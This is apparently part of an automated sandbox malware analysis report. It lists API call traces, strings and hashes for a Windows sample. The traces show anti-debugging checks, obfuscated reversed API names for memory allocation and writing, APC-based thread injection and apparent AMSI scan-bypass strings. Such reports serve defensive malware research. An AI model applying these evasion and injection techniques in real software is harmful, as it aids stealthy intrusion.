                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                              • API String ID: 1759228003-2375825460
                                                              • Opcode ID: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
                                                              • Instruction ID: 06649c1b97eb25c812fd971c42be33ce8a154b57e3a7e2509423c210bfd99aae
                                                              • Opcode Fuzzy Hash: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
                                                              • Instruction Fuzzy Hash: A7517271A5020C7AFB31EAA88C46FEFB7AD9B04744F8101E1A64CE6181DB749A44CF61

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                                                                • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                              • String ID: BCryptVerifySignature$bcrypt
                                                              • API String ID: 1002360270-4067648912
                                                              • Opcode ID: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
                                                              • Instruction ID: 84cd771f6ba0f28fc70c2bcfcc91237e7cb19730c5a9ea82ae58ce33788c9fff
                                                              • Opcode Fuzzy Hash: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
                                                              • Instruction Fuzzy Hash: F6F04471A91254FEEF10AF6CA845BB6739CD746395F2089B9F10D8B984C7705C50CB60

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                              • API String ID: 35162468-539270669
                                                              • Opcode ID: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
                                                              • Instruction ID: f8bd5b56870205a95a0b051ac978182eeba31eba343d15831c25445f4e4e8da2
                                                              • Opcode Fuzzy Hash: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
                                                              • Instruction Fuzzy Hash: 7AF0A77090828CBBDF25E7A888897DCFBB99B05328F6403E5F464611D1E7754644C651

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65
                                                                • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                              • String ID:
                                                              • API String ID: 2659941336-0
                                                              • Opcode ID: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
                                                              • Instruction ID: 05f6ddadbb77b1b73633a9bd3330c3c4505ba153439df8648ee6345c9da9b01f
                                                              • Opcode Fuzzy Hash: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
                                                              • Instruction Fuzzy Hash: 7F21BE71A50309BEEB11EAA4CC46FDEB7BDAB49700F5004A1F704E7181DAB4AA058BA5

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B9E436
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CheckConnectionInternet
                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                              • API String ID: 3847983778-3852638603
                                                              • Opcode ID: 44a0201bd25748bd7b18598b3403c7afa5ddb88cc03fb0b882a18caf2c4db813
                                                              • Instruction ID: 0f421fb79fafcce328faf3b59a115f4d0a136c8e67dfcb6ac61224242e3baa54
                                                              • Opcode Fuzzy Hash: 44a0201bd25748bd7b18598b3403c7afa5ddb88cc03fb0b882a18caf2c4db813
                                                              • Instruction Fuzzy Hash: 17411A35A50109AFEF10FBA4C880A9EB3FAEF8D710F2148B6E145A7250DA75ED05CF61

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$AllocCloseCreateStringWrite
                                                              • String ID:
                                                              • API String ID: 3308905243-0
                                                              • Opcode ID: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
                                                              • Instruction ID: 4c09621d0b36204d73890984c43506b9198a8dba053bfccdbf173aea4a719bf6
                                                              • Opcode Fuzzy Hash: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
                                                              • Instruction Fuzzy Hash: 0721BC71A40209BEEB10EAA4CD46F9EB7BDAB05B04F6144A1B704F71D0D7B46A048AA5

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                              • API String ID: 4072585319-445027087
                                                              • Opcode ID: 8a054b902032bce5ba87b6e0771d76f3d087f6fbeaa38f0b85a4b54910fc7c00
                                                              • Instruction ID: cd600c066876ba4d3fdff552ac61a877e73db1743d8690ce40571bf63fc44d3f
                                                              • Opcode Fuzzy Hash: 8a054b902032bce5ba87b6e0771d76f3d087f6fbeaa38f0b85a4b54910fc7c00
                                                              • Instruction Fuzzy Hash: 79110C75650209BFEF00EFA4DC41E9EB7EDEB49710F5188A1F504D7650DA34AA109B60

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                              • API String ID: 4072585319-445027087
                                                              • Opcode ID: 20c71e1caed18aa40bc0acbdce7ec08c6fc59e4b71ee6c516ab99e6a71435992
                                                              • Instruction ID: 0f9216d57d41e459141a85eaebaf72b1a7d430b722ae6fbbc53371307d265252
                                                              • Opcode Fuzzy Hash: 20c71e1caed18aa40bc0acbdce7ec08c6fc59e4b71ee6c516ab99e6a71435992
                                                              • Instruction Fuzzy Hash: BC111E75650209BFEF00EF94DC41F9EB7EDEB49710F5188A1F504D7650DA34AA10DB60
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                              • API String ID: 2719805696-3542721025
                                                              • Opcode ID: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
                                                              • Instruction ID: e094ef83edf11302806c6ba056f9d0212032e2f9fe6f7aa7b7911ea9d88f5965
                                                              • Opcode Fuzzy Hash: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
                                                              • Instruction Fuzzy Hash: C50100B5610205BFEF00EFA8D841E9EB7FDEB49710F9184A1F508D7A50DA70AD10DB64
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02B985B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$QueueThread
                                                              • String ID: NtQueueApcThread$ntdll
                                                              • API String ID: 3075473611-1374908105
                                                              • Opcode ID: 11608b2f3f3c01c14baba5e9628f2436f896bc41cbd977e40bb0d29d9edff113
                                                              • Instruction ID: 563bc1a1382e8e7fcd1b722ab6700863a55326fc4a5bc91789840ccf55dc5664
                                                              • Opcode Fuzzy Hash: 11608b2f3f3c01c14baba5e9628f2436f896bc41cbd977e40bb0d29d9edff113
                                                              • Instruction Fuzzy Hash: 92E026B2640209BF9F40DE9CD845E8F37EDAB0D7907004555FA09E7611D671ED248B75
                                                              APIs
                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                                                              • NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFileInitStringUnicode
                                                              • String ID:
                                                              • API String ID: 3559453722-0
                                                              • Opcode ID: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
                                                              • Instruction ID: 859238d7f6a49cac07242152b1ddf267ee39bfe1f41face0a37b1a6aec37dece
                                                              • Opcode Fuzzy Hash: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
                                                              • Instruction Fuzzy Hash: 8B014B75A0824AAEEF05FAA1CD81BCD77B9AB45704F5044E2E324F7091DA74AB148B25
                                                              APIs
                                                                • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                                                              • NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                                                                • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String$AllocDeleteFileFreeInitUnicode
                                                              • String ID:
                                                              • API String ID: 2841551397-0
                                                              • Opcode ID: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
                                                              • Instruction ID: f38f1d291bb24399c9ca2f4a515438841b77be2ca70569558a0df89cd848262f
                                                              • Opcode Fuzzy Hash: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
                                                              • Instruction Fuzzy Hash: CA01E871A0420DAAEB11FAE1CD52FDEB7BDEB49700F5045B1E614E2190EB74AB148A64
                                                              APIs
                                                                • Part of subcall function 02B96CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,02B96E34,00000000,00000000,02B96DB3,?,00000000,02B96E23), ref: 02B96D9F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFromInstanceProg
                                                              • String ID:
                                                              • API String ID: 2151042543-0
                                                              • Opcode ID: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
